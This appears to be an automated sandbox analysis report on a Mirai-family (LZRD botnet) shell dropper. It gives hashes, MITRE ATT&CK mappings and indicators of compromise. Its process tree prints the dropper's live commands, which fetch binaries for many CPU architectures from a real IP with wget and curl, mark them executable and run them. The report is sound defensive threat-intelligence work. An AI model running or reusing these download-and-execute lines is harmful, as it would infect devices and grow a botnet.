mirai | 8562b9fbc61584ce74c2f56847565faccf053134a8f4abf4aaee8e2ed82ccfc5

Analysis

max time kernel
149s
max time network
148s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
06-01-2025 06:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

bb9b02790d9369cfdce60911efa478c8
SHA1

cf899d0844a5cbac80784008dd7ff20ddc95ef8f
SHA256

8562b9fbc61584ce74c2f56847565faccf053134a8f4abf4aaee8e2ed82ccfc5
SHA512

55842a12c510f36d7c8d9f1b35bebf9729421d061f14b9cd1c895fab850087dc091b57a641faad012b785340edfeb5cb72b68abc22090e9cf3f842075bf0bb80

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
801	chmod
819	chmod
882	chmod
739	chmod
783	chmod
846	chmod
894	chmod
732	chmod
806	chmod
855	chmod
870	chmod
888	chmod
763	chmod
861	chmod
876	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/WTF	733	WTF
/tmp/WTF	740	WTF
/tmp/WTF	764	WTF
/tmp/WTF	785	WTF
/tmp/WTF	802	WTF
/tmp/WTF	807	WTF
/tmp/WTF	820	WTF
/tmp/WTF	848	WTF
/tmp/WTF	856	WTF
/tmp/WTF	862	WTF
/tmp/WTF	871	WTF
/tmp/WTF	877	WTF
/tmp/WTF	883	WTF
/tmp/WTF	889	WTF
/tmp/WTF	895	WTF

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTF
File opened for modification	/dev/misc/watchdog	WTF

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	WTF
File opened for modification	/sbin/watchdog	WTF

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-1.dat	upx
behavioral4/files/fstream-4.dat	upx

Reads runtime system information 37 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/702/cmdline	WTF
File opened for reading	/proc/864/cmdline	WTF
File opened for reading	/proc/874/cmdline	WTF
File opened for reading	/proc/885/cmdline	WTF
File opened for reading	/proc/695/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/894/cmdline	WTF
File opened for reading	/proc/701/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/672/cmdline	WTF
File opened for reading	/proc/703/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/879/cmdline	WTF
File opened for reading	/proc/886/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/700/cmdline	WTF
File opened for reading	/proc/677/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/432/cmdline	WTF
File opened for reading	/proc/667/cmdline	WTF
File opened for reading	/proc/671/cmdline	WTF
File opened for reading	/proc/853/cmdline	WTF
File opened for reading	/proc/891/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/678/cmdline	WTF
File opened for reading	/proc/708/cmdline	WTF
File opened for reading	/proc/825/cmdline	WTF
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/865/cmdline	WTF

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
738	cat
736	wget
737	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/wind.arm5	curl
File opened for modification	/tmp/wind.m68k	curl
File opened for modification	/tmp/wind.sh4	wget
File opened for modification	/tmp/wind.mips	curl
File opened for modification	/tmp/wind.mpsl	curl
File opened for modification	/tmp/wind.arm	curl
File opened for modification	/tmp/wind.arm	wget
File opened for modification	/tmp/wind.arm6	curl
File opened for modification	/tmp/wind.ppc	curl
File opened for modification	/tmp/wind.sh4	curl
File opened for modification	/tmp/wind.arc	wget
File opened for modification	/tmp/wind.arc	curl
File opened for modification	/tmp/wind.i468	curl
File opened for modification	/tmp/wind.x86	curl
File opened for modification	/tmp/wind.ppc	wget
File opened for modification	/tmp/wind.x86	wget
File opened for modification	/tmp/wind.mips	wget
File opened for modification	/tmp/wind.arm6	wget
File opened for modification	/tmp/wind.spc	wget
File opened for modification	/tmp/wind.m68k	wget
File opened for modification	/tmp/wind.arm5	wget
File opened for modification	/tmp/wind.arm7	wget
File opened for modification	/tmp/wind.i686	curl
File opened for modification	/tmp/wind.mpsl	wget
File opened for modification	/tmp/wind.arm7	curl
File opened for modification	/tmp/WTF	ohshit.sh
File opened for modification	/tmp/wind.x86_64	curl
File opened for modification	/tmp/wind.spc	curl

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:703
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.x86
  2⤵
  - Writes file to tmp directory
  PID:706
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:724
- /bin/cat
  cat wind.x86
  2⤵
  PID:731
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.x86 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:733
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:736
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:737
- /bin/cat
  cat wind.mips
  2⤵
  - System Network Configuration Discovery
  PID:738
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.mips wind.x86 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:740
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.arc
  2⤵
  - Writes file to tmp directory
  PID:742
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:743
- /bin/cat
  cat wind.arc
  2⤵
  PID:761
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.arc wind.mips wind.x86 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:763
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:764
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.i468
  2⤵
  PID:767
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.i468
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:774
- /bin/cat
  cat wind.i468
  2⤵
  PID:782
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.arc wind.i468 wind.mips wind.x86 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:783
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:785
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.i686
  2⤵
  PID:788
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:797
- /bin/cat
  cat wind.i686
  2⤵
  PID:800
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:801
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:802
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.x86_64
  2⤵
  PID:803
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:804
- /bin/cat
  cat wind.x86_64
  2⤵
  PID:805
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:807
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.mpsl
  2⤵
  - Writes file to tmp directory
  PID:808
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:809
- /bin/cat
  cat wind.mpsl
  2⤵
  PID:818
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:820
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.arm
  2⤵
  - Writes file to tmp directory
  PID:826
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:835
- /bin/cat
  cat wind.arm
  2⤵
  PID:845
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:848
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.arm5
  2⤵
  - Writes file to tmp directory
  PID:850
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:853
- /bin/cat
  cat wind.arm5
  2⤵
  PID:854
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:855
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:856
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.arm6
  2⤵
  - Writes file to tmp directory
  PID:858
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:859
- /bin/cat
  cat wind.arm6
  2⤵
  PID:860
- /bin/chmod
  chmod +x ohshit.sh systemd-private-0d3cb092f71f45a3a0920b010b20710c-systemd-timedated.service-MY6wP2 wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:862
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.arm7
  2⤵
  - Writes file to tmp directory
  PID:864
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:865
- /bin/cat
  cat wind.arm7
  2⤵
  PID:869
- /bin/chmod
  chmod +x ohshit.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:870
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:871
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.ppc
  2⤵
  - Writes file to tmp directory
  PID:873
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:874
- /bin/cat
  cat wind.ppc
  2⤵
  PID:875
- /bin/chmod
  chmod +x ohshit.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:876
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:877
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.spc
  2⤵
  - Writes file to tmp directory
  PID:879
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:880
- /bin/cat
  cat wind.spc
  2⤵
  PID:881
- /bin/chmod
  chmod +x ohshit.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:882
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:883
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.m68k
  2⤵
  - Writes file to tmp directory
  PID:885
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:886
- /bin/cat
  cat wind.m68k
  2⤵
  PID:887
- /bin/chmod
  chmod +x ohshit.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:889
- /usr/bin/wget
  wget http://154.216.17.34/hiddenbin/wind.sh4
  2⤵
  - Writes file to tmp directory
  PID:891
- /usr/bin/curl
  curl -O http://154.216.17.34/hiddenbin/wind.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:892
- /bin/cat
  cat wind.sh4
  2⤵
  PID:893
- /bin/chmod
  chmod +x ohshit.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.sh4 wind.spc wind.x86 wind.x86_64 WTF
  2⤵
  - File and Directory Permissions Modification
  PID:894
- /tmp/WTF
  ./WTF
  2⤵
  - Executes dropped EXE
  PID:895

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTF

Filesize
27KB

MD5
3fcfb56cbb500c729f8b83ef17263113

SHA1
1c6cd5c3bba0a22435d1b3820272ea40f5090cfd

SHA256
287674c6de3182e54ad83939f5051379ccba8dc7a3fbcd7ab312029f809c8f4d

SHA512
01c06a14a87364ac0fa1a5dea04dd58e598534e51742c4f48d98e3ef8db0ae0048f6b34b6b92724b350dc90b1f4e237a4ebb7de50996d6b0b43766ddecc49987

Download Submit
/tmp/WTF

Filesize
113KB

MD5
89b2f94ed5ae2da4f2e1427a38b18972

SHA1
b67be58ea19aafc0b5a817f78f2972b90a22f26c

SHA256
83d20d0e5aec9d315f798912ca20bf125bd0450abd8ea7c8f2af8020068bb356

SHA512
67da3bd5e1cb5de852941f0e7b51c906733b84a36b5a075eaea7f9c3be608a201d268881fea19078a8fa460e096118fbd3c4650b4c7b780bf268a7771916c313

Download Submit
/tmp/WTF

Filesize
217B

MD5
b5c5bc11ee843c629fe4dc7b16d9e3c8

SHA1
b4f2fc81c39d2c053c55ee06a161655f6546a372

SHA256
40e81787af6d49bfd5ff0dd8a740f823899d31ddf509e41b10165b13a8cc6e39

SHA512
fe3c0c15734685ad54a0068e56cd4247e7cf4716257d25e1916fc69e2c0d7a490166b3802339fff264e3e4ef86d2d4c156f5866eb931e99dce15ad64c96f1a16

Download Submit
/tmp/WTF

Filesize
217B

MD5
7996ac0d48cf7290dc39acdf4c6cbe78

SHA1
6949f5ef62883990e34538ee5bfdab36b5ddddde

SHA256
96db2cd9e9a66997acbc90e8f591e6b1696bb47500d1d07db2d20e3c92de70a8

SHA512
0eb9e26445b177be128aa076110ff2d3488641347c17eef3f2e44b50bb9fe18f4c7fa10cccf2985801fbfd5fcc5c163cf141452850927aa58f623737a9d9488a

Download Submit
/tmp/WTF

Filesize
65KB

MD5
7c3bb47cf9d45794e7cd7413cdfbdda0

SHA1
f36127d7c8ba376bff192cf0b2f51ab697166a25

SHA256
fab8a146f692fdc0b80953b3c0c052b7c224e94a78a9faa5537a02b331317e9c

SHA512
2de904917547648f08e0a1a88bf81cd8b506aaa4a1a6d9810a7fc62a7d19d0af646557a125e6857e5e261917a8bc27a970d6d65cee7c2c874c8d525fd8d7e84a

Download Submit
/tmp/wind.x86

Filesize
25KB

MD5
e802a5d2fc1758f633787e96999218c9

SHA1
e3bea9702230370bd3a9b7b503aedaf6eb8a99f0

SHA256
bedafc169492f127eddcab8a5eba9b7aa57acb0c43aa7b24ab4953331ed58b79

SHA512
6fabbf929eed5db052fb111dcb8582549481d4114b12c153a989180a9a9a0b052fbb85687d36221d59b542d62a2173c945c4fba22b374ea79685df09be727df8

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads